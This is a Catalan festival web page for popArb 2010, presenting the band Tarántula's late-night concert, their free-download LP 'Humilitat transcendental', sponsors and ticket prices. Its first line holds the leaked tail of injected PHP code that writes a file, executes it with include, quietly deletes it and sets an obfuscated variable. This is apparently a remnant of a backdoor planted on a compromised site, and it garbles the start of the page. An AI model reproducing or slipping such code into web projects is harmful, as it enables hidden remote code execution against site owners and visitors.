");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> popArb 2010 : cartell : Tarántula

popArb - Festival de Música Independent feta a Catalunya. Arbucies, Girona

Tarántula

divendres 25 de juny. 2010
Envelat Estrella Damm (Can Cassó) 00:20

L’1 de maig de 2009 Tarantula va publicar el seu nou LP Humilitat transcendental (Producciones Doradas) per a descàrrega gratuïta a la seva web (2000 descàrregues en menys de 10 dies). I al cap d’un mes ja estaven editant un vinil de 12” amb un format ideat per JoderArt, una portada amb dues pestanyes per rotar cares i platets voladors, a mig camí entre els llibres de papiroflèxia per a nens i el ¿Quién es quién?
Després d’Esperant a Ramon (Prodor, 2006) Tarantula presenta12 noves cançons (més tres bonus tracks a la web) pròpies d'un cançoner popular humanista, deixant enrere una altra vegada les restrictives vicissituds d'estil, per deixar anar en cada moment l'alè necessari.

En aquest treball ens parlen de les crisis des de dins i des de fora, amb la frescor i la ràbia necessàries rumb a unes galàxies interestel·lars, on llaurar un futur racional i humà, lluny del despietat esdevenir Terrestre. Un dia, els veurem pujar a la nau acompanyats per tots nosaltres, de la mà a un nou món on l'horror i la injustícia sigui un record d'una antiga civilització. Mentrestant, aquest disc ens ajudarà a albirar l'alegria i la nostàlgia d'aquest futur per arribar. Aterraran al popArb’10, abduccions garantides.

Organitzen: Ajuntament d'Arbcies, Cultura Dispersa

Collaboren: Departament de Cultura i Mitjans de Comunicaci de la Generalitat de Catalunya, Diputaci de Girona, AiE

Mitjans Oficials: TV3, iCat fm

Recomanat per: Scanner fm, Enderrock, Nativa, Butxaca, TresC

Col·laboradors: Demasié, FETE, cupatges,Vialis-Aro, Guerrilla Sound

 

estrella damm

Estrella Damm patrocina el popArb 2010

Venda a ServiCaixa

atrapalo

Abonaments i entrades de dia a Servicaixa.com.

Divendres: 30€
Dissabte: 35€
Abonament: 45€

Consulteu Servicaixa.com per conèixer preu de gestió i descomptes aplicables.

popArb 2010 © | culturaDispersa SL | Avís LegalSobre el popArb
RSS | youtube/popArb2009 || myspace/poparb